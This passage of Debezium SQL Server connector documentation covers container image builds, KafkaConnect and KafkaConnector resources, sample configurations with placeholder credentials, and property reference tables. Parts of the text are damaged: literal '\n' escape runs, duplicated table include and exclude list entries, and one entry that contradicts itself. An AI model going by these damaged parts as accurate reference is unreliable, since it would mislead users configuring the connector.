RUN curl -O {red-hat-maven-repository}debezium/debezium-connector-{connector-file}/{debezium-version}-redhat-__<build_number>__/debezium-connector-{connector-file}-{debezium-version}-redhat-__<build_number>__-plugin.zip
USER 1001
EOF
----
<1> You can specify any file name that you want.
<2> Specifies the path to your Kafka Connect plug-ins directory. If your Kafka Connect plug-ins directory is in a different location, replace this path with the actual path of your directory.
+
The command creates a Dockerfile with the name `debezium-container-for-sqlserver.yaml` in the current directory.

.. Build the container image from the `debezium-container-for-sqlserver.yaml` Dockerfile that you created in the previous step.
From the directory that contains the file, open a terminal window and enter one of the following commands:
+
[source,shell,options="nowrap"]
----
podman build -t debezium-container-for-sqlserver:latest .
----
+
[source,shell,options="nowrap"]
----
docker build -t debezium-container-for-sqlserver:latest .
----
The preceding commands build a container image with the name `debezium-container-for-sqlserver`.

.. Push your custom image to a container registry, such as quay.io or an internal container registry.
The container registry must be available to the OpenShift instance where you want to deploy the image.
Enter one of the following commands:
+
[source,shell,subs="+quotes"]
----
podman push _<myregistry.io>_/debezium-container-for-sqlserver:latest
----
+
[source,shell,subs="+quotes"]
----
docker push _<myregistry.io>_/debezium-container-for-sqlserver:latest
----

.. Create a new {prodname} SQL Server KafkaConnect custom resource (CR).
For example, create a KafkaConnect CR with the name `dbz-connect.yaml` that specifies `annotations` and `image` properties as shown in the following example:
+
[source,yaml,subs="+attributes"]
----
apiVersion: {KafkaConnectApiVersion}
kind: KafkaConnect
metadata:
  name: my-connect-cluster
  annotations:
    strimzi.io/use-connector-resources: "true" // <1>
spec:
  #...
  image: debezium-container-for-sqlserver // <2>
----
<1> `metadata.annotations` indicates to the Cluster Operator that KafkaConnector resources are used to configure connectors in this Kafka Connect cluster.
<2> `spec.image` specifies the name of the image that you created to run your Debezium connector.
This property overrides the `STRIMZI_DEFAULT_KAFKA_CONNECT_IMAGE` variable in the Cluster Operator.

.. Apply the `KafkaConnect` CR to the OpenShift Kafka Connect environment by entering the following command:
+
[source,shell,options="nowrap"]
----
oc create -f dbz-connect.yaml
----
+
The command adds a Kafka Connect instance that specifies the name of the image that you created to run your {prodname} connector.

. Create a `KafkaConnector` custom resource that configures your {prodname} SQL Server connector instance.
+
You configure a {prodname} SQL Server connector in a `.yaml` file that specifies the configuration properties for the connector.
The connector configuration might instruct {prodname} to produce events for a subset of the schemas and tables, or it might set properties so that {prodname} ignores, masks, or truncates values in specified columns that are sensitive, too large, or not needed.
+
The following example configures a {prodname} connector that connects to a SQL Server host, `192.168.99.100`, on port `1433`.
This host has databases named `testDB1` and `testDB2`, a table with the name `customers`, and `fulfillment` is the server's logical name.
+
.SQL Server `fulfillment-connector.yaml`
[source,yaml,subs="+attributes",options="nowrap"]
----
apiVersion: {KafkaConnectorApiVersion}
kind: KafkaConnector
metadata:
  name: fulfillment-connector // <1>
  labels:
    strimzi.io/cluster: my-connect-cluster
  annotations:
    strimzi.io/use-connector-resources: 'true'
spec:
  class: io.debezium.connector.sqlserver.SqlServerConnector // <2>
  config:
    database.hostname: 192.168.99.100 // <3>
    database.port: 1433 // <4>
    database.user: debezium // <5>
    database.password: dbz // <6>
    database.names: testDB1,testDB2 // <7>
    topic.prefix: fulfillment // <8>
    table.include.list: dbo.customers // <9>
    schema.history.internal.kafka.bootstrap.servers: my-cluster-kafka-bootstrap:9092 // <10>
    schema.history.internal.kafka.topic: schemahistory.fulfillment // <11>
    database.ssl.truststore: path/to/trust-store // <12>
    database.ssl.truststore.password: password-for-trust-store // <13>
----
+
.Descriptions of connector configuration settings
[cols="1,7",options="header",subs="+attributes"]
|===
|Item |Description

|1
|The name of our connector when we register it with a Kafka Connect service.

|2
|The name of this SQL Server connector class.

|3
|The address of the SQL Server instance.

|4
|The port number of the SQL Server instance.

|5
|The name of the SQL Server user.

|6
|The password for the SQL Server user.

|7
|The names of the databases from which to capture changes.

|8
|The topic prefix for the SQL Server instance/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the xref:{link-avro-serialization}#avro-serialization[Avro converter] is used.

|9
|A list of all tables whose changes {prodname} should capture.

|10
|The list of Kafka brokers that this connector will use to write and recover DDL statements to the database schema history topic.

|11
|The name of the database schema history topic where the connector will write and recover DDL statements.
This topic is for internal use only and should not be used by consumers.

|12
|The path to the SSL truststore that stores the server's signer certificates.
This property is required unless database encryption is disabled (`database.encrypt=false`).

|13
|The SSL truststore password.
This property is required unless database encryption is disabled (`database.encrypt=false`).

|===

. Create your connector instance with Kafka Connect.
 For example, if you saved your `KafkaConnector` resource in the `fulfillment-connector.yaml` file, you would run the following command:
+
[source,shell,options="nowrap"]
----
oc apply -f fulfillment-connector.yaml
----
+
The preceding command registers `fulfillment-connector` and the connector starts to run against the `testDB1` and `testDB2` databases as defined in the `KafkaConnector` CR.

[id="verifying-that-the-debezium-sqlserver-connector-is-running"]
=== Verifying that the {prodname} SQL Server connector is running

include::{partialsdir}/modules/all-connectors/proc-verifying-the-connector-deployment.adoc[leveloffset=+1]

endif::product[]

ifdef::community[]
[[sqlserver-example-configuration]]
=== SQL Server connector configuration example

Following is an example of the configuration for a connector instance that captures data from a SQL Server instance at port 1433 on 192.168.99.100, which we logically name `fullfillment`.
Typically, you configure the {prodname} SQL Server connector in a JSON file by setting the configuration properties that are available for the connector.

You can choose to produce events for a subset of the schemas and tables in a database.
Optionally, you can ignore, mask, or truncate columns that contain sensitive data, that are larger than a specified size, or that you do not need.

[source,json]
----
{
  "name": "inventory-connector", // <1>
  "config": {
    "connector.class": "io.debezium.connector.sqlserver.SqlServerConnector", // <2>
    "database.hostname": "192.168.99.100", // <3>
    "database.port": "1433", // <4>
    "database.user": "sa", // <5>
    "database.password": "Password!", // <6>
    "database.names": "testDB1,testDB2", // <7>
    "topic.prefix": "fullfillment", // <8>
    "table.include.list": "dbo.customers", // <9>
    "schema.history.internal.kafka.bootstrap.servers": "kafka:9092", // <10>
    "schema.history.internal.kafka.topic": "schemahistory.fullfillment", // <11>
    "database.ssl.truststore": "path/to/trust-store", // <12>
    "database.ssl.truststore.password": "password-for-trust-store" // <13>
  }
}
----
<1> The name of our connector when we register it with a Kafka Connect service.
<2> The name of this SQL Server connector class.
<3> The address of the SQL Server instance.
<4> The port number of the SQL Server instance.
<5> The name of the SQL Server user.
<6> The password for the SQL Server user.
<7> The names of the databases from which to capture changes.
<8> The topic prefix for the SQL Server instance/cluster, which forms a namespace and is used in all the names of the Kafka topics to which the connector writes, the Kafka Connect schema names, and the namespaces of the corresponding Avro schema when the xref:{link-avro-serialization}#avro-serialization[Avro converter] is used.
<9> A list of all tables whose changes {prodname} should capture.
<10> The list of Kafka brokers that this connector will use to write and recover DDL statements to the database schema history topic.
<11> The name of the database schema history topic where the connector will write and recover DDL statements. This topic is for internal use only and should not be used by consumers.
<12> The path to the SSL truststore that stores the server's signer certificates.
This property is required unless database encryption is disabled (`database.encrypt=false`).
<13> The SSL truststore password.
This property is required unless database encryption is disabled (`database.encrypt=false`).
endif::community[]

For the complete list of the configuration properties that you can set for the {prodname} SQL Server connector, see xref:{link-sqlserver-connector}#sqlserver-connector-properties[SQL Server connector properties].

ifdef::community[]
You can send this configuration with a `POST` command to a running Kafka Connect service.
The service records the configuration and starts up the one connector task that performs the following tasks:

* Connects to the SQL Server database.
* Reads the transaction log.
* Records change events to Kafka topics.

[[sqlserver-adding-connector-configuration]]
=== Adding connector configuration

To start running a {prodname} SQL Server connector, create a connector configuration, and add the configuration to your Kafka Connect cluster.

.Prerequisites

* xref:{link-sqlserver-connector}#setting-up-sqlserver[CDC is enabled on SQL Server].
* The {prodname} SQL Server connector is installed.

.Procedure

. Create a configuration for the SQL Server connector.

. Use the link:{link-kafka-docs}/#connect_rest[Kafka Connect REST API] to add that connector configuration to your Kafka Connect cluster.
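+
For example, assuming that you saved the JSON configuration shown earlier in a file named `register-sqlserver.json`, and that the Kafka Connect REST API listens on its default address of `localhost:8083`, you might register the connector with a command like the following; the host, port, and file name are illustrative and depend on your deployment:
+
[source,shell]
----
curl -i -X POST -H "Accept:application/json" -H "Content-Type:application/json" \
  http://localhost:8083/connectors/ -d @register-sqlserver.json
----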

endif::community[]

.Results

When the connector starts, it xref:{link-sqlserver-connector}#sqlserver-snapshots[performs a consistent snapshot] of the SQL Server databases that the connector is configured for.
The connector then starts generating data change events for row-level operations and streaming the change event records to Kafka topics.

// Type: reference
// Title: Descriptions of {prodname} SQL Server connector configuration properties
// ModuleID: descriptions-of-debezium-sqlserver-connector-configuration-properties
[[sqlserver-connector-properties]]
=== Connector properties

The {prodname} SQL Server connector has numerous configuration properties that you can use to achieve the right connector behavior for your application.
Many properties have default values.

Information about the properties is organized as follows:

* xref:sqlserver-required-connector-configuration-properties[Required connector configuration properties]
* xref:sqlserver-advanced-connector-configuration-properties[Advanced connector configuration properties]
* xref:debezium-sqlserver-connector-database-history-configuration-properties[Database schema history connector configuration properties] that control how {prodname} processes events that it reads from the database schema history topic.
** xref:sqlserver-pass-through-database-history-properties-for-configuring-producer-and-consumer-clients[Pass-through database schema history properties]
* xref:debezium-sqlserver-connector-pass-through-database-driver-configuration-properties[Pass-through database driver properties] that control the behavior of the database driver.

[id="sqlserver-required-connector-configuration-properties"]
==== Required {prodname} SQL Server connector configuration properties

The following configuration properties are _required_ unless a default value is available.

[cols="30%a,25%a,45%a",options="header"]
|===
|Property
|Default
|Description

|[[sqlserver-property-name]]<<sqlserver-property-name, `+name+`>>
|No default
|Unique name for the connector. Attempting to register again with the same name will fail. (This property is required by all Kafka Connect connectors.)

|[[sqlserver-property-connector-class]]<<sqlserver-property-connector-class, `+connector.class+`>>
|No default
|The name of the Java class for the connector. Always use a value of `io.debezium.connector.sqlserver.SqlServerConnector` for the SQL Server connector.

|[[sqlserver-property-tasks-max]]<<sqlserver-property-tasks-max, `+tasks.max+`>>
|`1`
|Specifies the maximum number of tasks that the connector can use to capture data from the database instance.
If the xref:sqlserver-property-database-names[`database.names`] list contains more than one element, increase the value of this property to a number less than or equal to the number of elements in the list.

|[[sqlserver-property-database-hostname]]<<sqlserver-property-database-hostname, `+database.hostname+`>>
|No default
|IP address or hostname of the SQL Server database server.

|[[sqlserver-property-database-port]]<<sqlserver-property-database-port, `+database.port+`>>
|`1433`
|Integer port number of the SQL Server database server.

|[[sqlserver-property-database-user]]<<sqlserver-property-database-user, `+database.user+`>>
|No default
|Username to use when connecting to the SQL Server database server.
Can be omitted when using Kerberos authentication, which can be configured using xref:debezium-{context}-connector-pass-through-database-driver-configuration-properties[pass-through properties].

|[[sqlserver-property-database-password]]<<sqlserver-property-database-password, `+database.password+`>>
|No default
|Password to use when connecting to the SQL Server database server.

|[[sqlserver-property-database-instance]] <<sqlserver-property-database-instance, `+database.instance+`>>
|No default
|Specifies the instance name of the link:https://docs.microsoft.com/en-us/sql/database-engine/configure-windows/database-engine-instances-sql-server?view=sql-server-latest#instances[SQL Server named instance].

ifdef::community[]
|[[sqlserver-property-database-names]]<<sqlserver-property-database-names, `+database.names+`>>
|No default
|The comma-separated list of the SQL Server database names from which to stream the changes.
endif::community[]
|[[sqlserver-property-topic-prefix]]<<sqlserver-property-topic-prefix, `+topic.prefix+`>>
|No default
|Topic prefix that provides a namespace for the SQL Server database server that you want {prodname} to capture.
The prefix should be unique across all other connectors, since it is used as the prefix for all Kafka topic names that receive records from this connector.
Use only alphanumeric characters, hyphens, dots, and underscores in the database server logical name. 
+\n +\n[WARNING]\n====\nDo not change the value of this property.\nIf you change the name value, after a restart, instead of continuing to emit events to the original topics, the connector emits subsequent events to topics whose names are based on the new value.\nThe connector is also unable to recover its database schema history topic.\n====\n\n|[[sqlserver-property-schema-include-list]]<<sqlserver-property-schema-include-list, `+schema.include.list+`>>\n|No default\n|An optional, comma-separated list of regular expressions that match names of schemas for which you *want* to capture changes.\nAny schema name not included in `schema.include.list` is excluded from having its changes captured.\nBy default, the connector captures changes for all non-system schemas. +\n\nTo match the name of a schema, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the schema; it does not match substrings that might be present in a schema name. +\nIf you include this property in the configuration, do not also set the `schema.exclude.list` property.\n\n|[[sqlserver-property-schema-exclude-list]]<<sqlserver-property-schema-exclude-list, `+schema.exclude.list+`>>\n|No default\n|An optional, comma-separated list of regular expressions that match names of schemas for which you *do not* want to capture changes.\nAny schema whose name is not included in `schema.exclude.list` has its changes captured, with the exception of system schemas. +\n\nTo match the name of a schema, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the schema; it does not match substrings that might be present in a schema name. +\nIf you include this property in the configuration, do not set the `schema.include.list` property.\n\n|[[sqlserver-property-table-include-list]]<<sqlserver-property-table-include-list, `+table.include.list+`>>\n|No default\n|An optional comma-separated list of regular expressions that match fully-qualified table identifiers for tables that you want {prodname} to capture.\nBy default, the connector captures all non-system tables for the designated schemas.\nWhen this property is set, the connector captures changes only from the specified tables.\nEach identifier is of the form _schemaName_._tableName_. +\n\nTo match the name of a table, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.\nThat is, the specified expression is matched against the entire name string of the table; it does not match substrings that might be present in a table name. +\nIf you include this property in the configuration, do not also set the `table.exclude.list` property.\n\n|[[sqlserver-property-table-exclude-list]]<<sqlserver-property-table-exclude-list, `+table.exclude.list+`>>\n|No default\n|An optional comma-separated list of regular expressions that match fully-qualified table identifiers for the tables that you want to exclude from being captured.\n{prodname} captures all tables that are not included in `table.exclude.list`.\nEach identifier is of the form _schemaName_._tableName_. 
+

To match the name of a table, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.
That is, the specified expression is matched against the entire name string of the table; it does not match substrings that might be present in a table name. +
If you include this property in the configuration, do not also set the `table.exclude.list` property.

|[[sqlserver-property-table-exclude-list]]<<sqlserver-property-table-exclude-list, `+table.exclude.list+`>>
|No default
|An optional comma-separated list of regular expressions that match fully-qualified table identifiers for the tables that you want to exclude from being captured.
{prodname} captures all tables that are not included in `table.exclude.list`.
Each identifier is of the form _schemaName_._tableName_. +

To match the name of a table, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.
That is, the specified expression is matched against the entire name string of the table; it does not match substrings that might be present in a table name. +
If you include this property in the configuration, do not also set the `table.include.list` property.

|[[sqlserver-property-column-include-list]]<<sqlserver-property-column-include-list, `+column.include.list+`>>
|_empty string_
|An optional comma-separated list of regular expressions that match the fully-qualified names of columns that should be included in the change event message values.
Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.
Note that primary key columns are always included in the event's key, even if not included in the value. +

To match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.
That is, the specified expression is matched against the entire name string of the column; it does not match substrings that might be present in a column name. +
If you include this property in the configuration, do not also set the `column.exclude.list` property.

|[[sqlserver-property-column-exclude-list]]<<sqlserver-property-column-exclude-list, `+column.exclude.list+`>>
|_empty string_
|An optional comma-separated list of regular expressions that match the fully-qualified names of columns that should be excluded from change event message values.
Fully-qualified names for columns are of the form _schemaName_._tableName_._columnName_.
Note that primary key columns are always included in the event's key, even if they are excluded from the value. +

To match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.
That is, the specified expression is matched against the entire name string of the column; it does not match substrings that might be present in a column name. +
If you include this property in the configuration, do not also set the `column.include.list` property.

|[[sqlserver-property-column-mask-hash]]<<sqlserver-property-column-mask-hash, `column.mask.hash._hashAlgorithm_.with.salt._salt_`>>;
[[sqlserver-property-column-mask-hash-v2]]<<sqlserver-property-column-mask-hash-v2, `column.mask.hash.v2._hashAlgorithm_.with.salt._salt_`>>
|_n/a_
|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns.
Fully-qualified names for columns are of the form `_<schemaName>_._<tableName>_._<columnName>_`. +
To match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.
That is, the specified expression is matched against the entire name string of the column; the expression does not match substrings that might be present in a column name.
In the resulting change event record, the values for the specified columns are replaced with pseudonyms. +

A pseudonym consists of the hashed value that results from applying the specified _hashAlgorithm_ and _salt_.
Based on the hash function that is used, referential integrity is maintained, while column values are replaced with pseudonyms.
Supported hash functions are described in the {link-java7-standard-names}[MessageDigest section] of the Java Cryptography Architecture Standard Algorithm Name Documentation. 
+\n +\nIn the following example, `CzQMA0cB5K` is a randomly selected salt. +\n\n----\ncolumn.mask.hash.SHA-256.with.salt.CzQMA0cB5K = inventory.orders.customerName, inventory.shipment.customerName\n----\n\nIf necessary, the pseudonym is automatically shortened to the length of the column.\nThe connector configuration can include multiple properties that specify different hash algorithms and salts. +\n +\nDepending on the _hashAlgorithm_ used, the _salt_ selected, and the actual data set, the resulting data set might not be completely masked. +\n +\nHashing strategy version 2 should be used to ensure fidelity if the value is being hashed in different places or systems.\n\n|[[sqlserver-property-time-precision-mode]]<<sqlserver-property-time-precision-mode, `+time.precision.mode+`>>\n|`adaptive`\n| Time, date, and timestamps can be represented with different kinds of precision, including: `adaptive` (the default) captures the time and timestamp values exactly as in the database using either millisecond, microsecond, or nanosecond precision values based on the database column's type; or `connect` always represents time and timestamp values using Kafka Connect's built-in representations for Time, Date, and Timestamp, which uses millisecond precision regardless of the database columns' precision. See xref:{link-sqlserver-connector}#sqlserver-temporal-values[temporal values].\n\n|[[sqlserver-property-decimal-handling-mode]]<<sqlserver-property-decimal-handling-mode,`+decimal.handling.mode+`>>\n|`precise`\n|Specifies how the connector should handle values for `DECIMAL` and `NUMERIC` columns: +\n +\n`precise` (the default) represents them precisely using `java.math.BigDecimal` values represented in change events in a binary form. +\n +\n`double` represents them using `double` values, which may result in a loss of precision but is easier to use. +\n +\n`string` encodes values as formatted strings, which is easy to consume but semantic information about the real type is lost.\n\n|[[sqlserver-property-include-schema-changes]]<<sqlserver-property-include-schema-changes, `+include.schema.changes+`>>\n|`true`\n|Boolean value that specifies whether the connector should publish changes in the database schema to a Kafka topic with the same name as the database server ID. Each schema change is recorded with a key that contains the database name and a value that is a JSON structure that describes the schema update. This is independent of how the connector internally records database schema history. The default is `true`.\n\n|[[sqlserver-property-tombstones-on-delete]]<<sqlserver-property-tombstones-on-delete, `+tombstones.on.delete+`>>\n|`true`\n|Controls whether a _delete_ event is followed by a tombstone event. +\n +\n`true` - a delete operation is represented by a _delete_ event and a subsequent tombstone event. +\n +\n`false` - only a _delete_ event is emitted. 
+
 +
After a source record is deleted, emitting a tombstone event (the default behavior) allows Kafka to completely delete all events that pertain to the key of the deleted row in case {link-kafka-docs}/#compaction[log compaction] is enabled for the topic.

|[[sqlserver-property-column-truncate-to-length-chars]]<<sqlserver-property-column-truncate-to-length-chars, `column.truncate.to._length_.chars`>>
|_n/a_
|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns.
Set this property if you want to truncate the data in a set of columns when it exceeds the number of characters specified by the _length_ in the property name.
Set `length` to a positive integer value, for example, `column.truncate.to.20.chars`.

The fully-qualified name of a column observes the following format: `_<schemaName>_._<tableName>_._<columnName>_`.
To match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.
That is, the specified expression is matched against the entire name string of the column; the expression does not match substrings that might be present in a column name.

You can specify multiple properties with different lengths in a single configuration.

|[[sqlserver-property-column-mask-with-length-chars]]<<sqlserver-property-column-mask-with-length-chars, `column.mask.with._length_.chars`>>
|_n/a_
|An optional, comma-separated list of regular expressions that match the fully-qualified names of character-based columns.
Set this property if you want the connector to mask the values for a set of columns, for example, if they contain sensitive data.
Set `_length_` to a positive integer to replace data in the specified columns with the number of asterisk (`*`) characters specified by the _length_ in the property name.
Set _length_ to `0` (zero) to replace data in the specified columns with an empty string.

The fully-qualified name of a column observes the following format: _schemaName_._tableName_._columnName_.
To match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.
That is, the specified expression is matched against the entire name string of the column; the expression does not match substrings that might be present in a column name.

You can specify multiple properties with different lengths in a single configuration.

|[[sqlserver-property-column-propagate-source-type]]<<sqlserver-property-column-propagate-source-type, `+column.propagate.source.type+`>>
|_n/a_
|An optional, comma-separated list of regular expressions that match the fully-qualified names of columns for which you want the connector to emit extra parameters that represent column metadata.
When this property is set, the connector adds the following fields to the schema of event records:

* `pass:[_]pass:[_]debezium.source.column.type` +
* `pass:[_]pass:[_]debezium.source.column.length` +
* `pass:[_]pass:[_]debezium.source.column.scale` +

These parameters propagate a column's original type name, length, and scale, respectively. +
Enabling the connector to emit this extra data can assist in properly sizing specific numeric or character-based columns in sink databases.

The fully-qualified name of a column observes the following format: _schemaName_._tableName_._columnName_. +
To match the name of a column, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.
That is, the specified expression is matched against the entire name string of the column; the expression does not match substrings that might be present in a column name.

|[[sqlserver-property-datatype-propagate-source-type]]<<sqlserver-property-datatype-propagate-source-type,`+datatype.propagate.source.type+`>>
|_n/a_
|An optional, comma-separated list of regular expressions that specify the fully-qualified names of data types that are defined for columns in a database.
When this property is set, for columns with matching data types, the connector emits event records that include the following extra fields in their schema:

* `pass:[_]pass:[_]debezium.source.column.type` +
* `pass:[_]pass:[_]debezium.source.column.length` +
* `pass:[_]pass:[_]debezium.source.column.scale` +

These parameters propagate a column's original type name, length, and scale, respectively. +
Enabling the connector to emit this extra data can assist in properly sizing specific numeric or character-based columns in sink databases.

The fully-qualified name of a data type observes the following format: _schemaName_._tableName_._typeName_. +
To match the name of a data type, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.
That is, the specified expression is matched against the entire name string of the data type; the expression does not match substrings that might be present in a type name.

For the list of SQL Server-specific data type names, see the xref:sqlserver-data-types[SQL Server data type mappings].

|[[sqlserver-property-message-key-columns]]<<sqlserver-property-message-key-columns, `+message.key.columns+`>>
|_n/a_
|A list of expressions that specify the columns that the connector uses to form custom message keys for change event records that it publishes to the Kafka topics for specified tables.

By default, {prodname} uses the primary key column of a table as the message key for records that it emits.
In place of the default, or to specify a key for tables that lack a primary key, you can configure custom message keys based on one or more columns. +
 +
To establish a custom message key for a table, list the table, followed by the columns to use as the message key.
Each list entry takes the following format: +
 +
`_<fully-qualified_tableName>_:__<keyColumn>__,_<keyColumn>_` +
 +
To base a table key on multiple column names, insert commas between the column names.

Each fully-qualified table name is a regular expression in the following format: +
 +
`_<schemaName>_._<tableName>_` +
 +
The property can include entries for multiple tables.
Use a semicolon to separate table entries in the list. +
 +
The following example sets the message key for the `inventory.customers` table and for `purchaseorders` tables in any schema: +
 +
`inventory.customers:pk1,pk2;(.*).purchaseorders:pk3,pk4` +
 +
For the table `inventory.customers`, the columns `pk1` and `pk2` are specified as the message key.
For `purchaseorders` tables in any schema, the columns `pk3` and `pk4` serve as the message key.

There is no limit to the number of columns that you use to create custom message keys.
However, it's best to use the minimum number that are required to specify a unique key.

|[[sqlserver-property-binary-handling-mode]]<<sqlserver-property-binary-handling-mode, `+binary.handling.mode+`>>
|bytes
|Specifies how binary (`binary`, `varbinary`) columns should be represented in change events: `bytes` represents binary data as a byte array (default), `base64` represents binary data as a base64-encoded String, `base64-url-safe` represents binary data as a base64-url-safe-encoded String, and `hex` represents binary data as a hex-encoded (base16) String.

|[[sqlserver-property-schema-name-adjustment-mode]]<<sqlserver-property-schema-name-adjustment-mode,`+schema.name.adjustment.mode+`>>
|none
|Specifies how schema names should be adjusted for compatibility with the message converter used by the connector. Possible settings: +

* `none` does not apply any adjustment. +
* `avro` replaces the characters that cannot be used in the Avro type name with underscore. +

|===
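
As a quick illustration of how the fully-qualified, anchored expressions described in the preceding table combine in practice, the following fragment sketches a hypothetical connector configuration; all schema, table, and column names are illustrative:

[source,properties]
----
# Capture only dbo.customers and dbo.orders (anchored regular expressions).
table.include.list=dbo.customers,dbo.orders
# Exclude a sensitive column; the name must be fully qualified.
column.exclude.list=dbo.customers.ssn
# Use order_id as the message key for dbo.orders.
message.key.columns=dbo.orders:order_id
----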

[id="sqlserver-advanced-connector-configuration-properties"]
==== Advanced SQL Server connector configuration properties

The following _advanced_ configuration properties have good defaults that will work in most situations and therefore rarely need to be specified in the connector's configuration.

[cols="30%a,25%a,45%a",options="header"]
|===
|Property
|Default
|Description

|[[sqlserver-property-converters]]<<sqlserver-property-converters, `converters`>>
|No default
|Enumerates a comma-separated list of the symbolic names of the {link-prefix}:{link-custom-converters}#custom-converters[custom converter] instances that the connector can use.
For example, +

`isbn`

You must set the `converters` property to enable the connector to use a custom converter.

For each converter that you configure for a connector, you must also add a `.type` property, which specifies the fully-qualified name of the class that implements the converter interface.
The `.type` property uses the following format: +

`_<converterSymbolicName>_.type` +

For example, +

 isbn.type: io.debezium.test.IsbnConverter

If you want to further control the behavior of a configured converter, you can add one or more configuration parameters to pass values to the converter.
To associate any additional configuration parameter with a converter, prefix the parameter names with the symbolic name of the converter.
For example, +

 isbn.schema.name: io.debezium.sqlserver.type.Isbn

|[[sqlserver-property-snapshot-mode]]<<sqlserver-property-snapshot-mode, `+snapshot.mode+`>>
|_initial_
|A mode for taking an initial snapshot of the structure and optionally data of captured tables.
Once the snapshot is complete, the connector continues reading change events from the database's transaction log.
The following values are supported:

* `initial`: Takes a snapshot of structure and data of captured tables; useful if topics should be populated with a complete representation of the data from the captured tables. +
* `initial_only`: Takes a snapshot of structure and data like `initial`, but does not transition into streaming changes once the snapshot has completed. +
* `schema_only`: Takes a snapshot of the structure of captured tables only; useful if only changes happening from now onwards should be propagated to topics.

|[[sqlserver-property-snapshot-include-collection-list]]<<sqlserver-property-snapshot-include-collection-list, `+snapshot.include.collection.list+`>>
| All tables specified in `table.include.list`
|An optional, comma-separated list of regular expressions that match the fully-qualified names (`_<dbName>_._<schemaName>_._<tableName>_`) of the tables to include in a snapshot.
The specified items must be named in the connector's xref:{context}-property-table-include-list[`table.include.list`] property.
This property takes effect only if the connector's xref:sqlserver-property-snapshot-mode[`snapshot.mode`] property is set to a value other than `never`. +
This property does not affect the behavior of incremental snapshots. +

To match the name of a table, {prodname} applies the regular expression that you specify as an _anchored_ regular expression.
That is, the specified expression is matched against the entire name string of the table; it does not match substrings that might be present in a table name.

|[[sqlserver-property-snapshot-isolation-mode]]<<sqlserver-property-snapshot-isolation-mode, `+snapshot.isolation.mode+`>>
|_repeatable_read_
|Mode to control which transaction isolation level is used and how long the connector locks tables that are designated for capture.
The following values are supported:

* `read_uncommitted`
* `read_committed`
* `repeatable_read`
* `snapshot`
* `exclusive` (`exclusive` mode uses the repeatable read isolation level; however, it takes an exclusive lock on all tables to be read). +

The `snapshot`, `read_committed` and `read_uncommitted` modes do not prevent other transactions from updating table rows during an initial snapshot.
The `exclusive` and `repeatable_read` modes do prevent concurrent updates. +

Mode choice also affects data consistency. Only the `exclusive` and `snapshot` modes guarantee full consistency, that is, the initial snapshot and streaming logs constitute a linear history.
In the case of the `repeatable_read` and `read_committed` modes, it might happen that, for instance, a record that is added appears twice: once in the initial snapshot and once in the streaming phase. Nonetheless, that consistency level is suitable for data mirroring.
For `read_uncommitted` there are no data consistency guarantees at all (some data might be lost or corrupted).

|[[sqlserver-property-event-processing-failure-handling-mode]]<<sqlserver-property-event-processing-failure-handling-mode, `+event.processing.failure.handling.mode+`>>
|`fail`
|Specifies how the connector should react to exceptions during processing of events.
`fail` propagates the exception (indicating the offset of the problematic event), causing the connector to stop. +
`warn` causes the problematic event to be skipped and the offset of the problematic event to be logged. +
`skip` causes the problematic event to be skipped.

|[[sqlserver-property-poll-interval-ms]]<<sqlserver-property-poll-interval-ms, `+poll.interval.ms+`>>
|`500`
|Positive integer value that specifies the number of milliseconds the connector should wait during each iteration for new change events to appear.
Defaults to 500 milliseconds.

|[[sqlserver-property-max-queue-size]]<<sqlserver-property-max-queue-size, `+max.queue.size+`>>
|`8192`
|Positive integer value that specifies the maximum number of records that the blocking queue can hold.
When {prodname} reads events streamed from the database, it places the events in the blocking queue before it writes them to Kafka.
The blocking queue can provide backpressure for reading change events from the database
in cases where the connector ingests messages faster than it can write them to Kafka, or when Kafka becomes unavailable.
Events that are held in the queue are disregarded when the connector periodically records offsets.
Always set the value of `max.queue.size` to be larger than the value of xref:{context}-property-max-batch-size[`max.batch.size`].

|[[sqlserver-property-max-queue-size-in-bytes]]<<sqlserver-property-max-queue-size-in-bytes, `+max.queue.size.in.bytes+`>>
|`0`
|A long integer value that specifies the maximum volume of the blocking queue in bytes.
By default, volume limits are not specified for the blocking queue.
To specify the number of bytes that the queue can consume, set this property to a positive long value. +
If xref:sqlserver-property-max-queue-size[`max.queue.size`] is also set, writing to the queue is blocked when the size of the queue reaches the limit specified by either property.
For example, if you set `max.queue.size=1000`, and `max.queue.size.in.bytes=5000`, writing to the queue is blocked after the queue contains 1000 records, or after the volume of the records in the queue reaches 5000 bytes.

|[[sqlserver-property-max-batch-size]]<<sqlserver-property-max-batch-size, `+max.batch.size+`>>
|`2048`
|Positive integer value that specifies the maximum size of each batch of events that should be processed during each iteration of this connector.

|[[sqlserver-property-heartbeat-interval-ms]]<<sqlserver-property-heartbeat-interval-ms, `+heartbeat.interval.ms+`>>
|`0`
|Controls how frequently heartbeat messages are sent. +
This property contains an interval in milliseconds that defines how frequently the connector sends messages to a heartbeat topic.
The property can be used to confirm whether the connector is still receiving change events from the database.
Heartbeat messages are also useful in cases where only records in non-captured tables change for a longer period of time.
In such a situation, the connector continues to read the log from the database but never emits any change messages into Kafka, which in turn means that no offset updates are committed to Kafka.
This can result in more change events being re-sent after a connector restart.
Set this parameter to `0` to not send heartbeat messages at all. +
Disabled by default.

|[[sqlserver-property-snapshot-delay-ms]]<<sqlserver-property-snapshot-delay-ms, `+snapshot.delay.ms+`>>
|No default
|An interval in milliseconds that the connector should wait before taking a snapshot after starting up. +
Can be used to avoid snapshot interruptions when starting multiple connectors in a cluster, which may cause re-balancing of connectors.

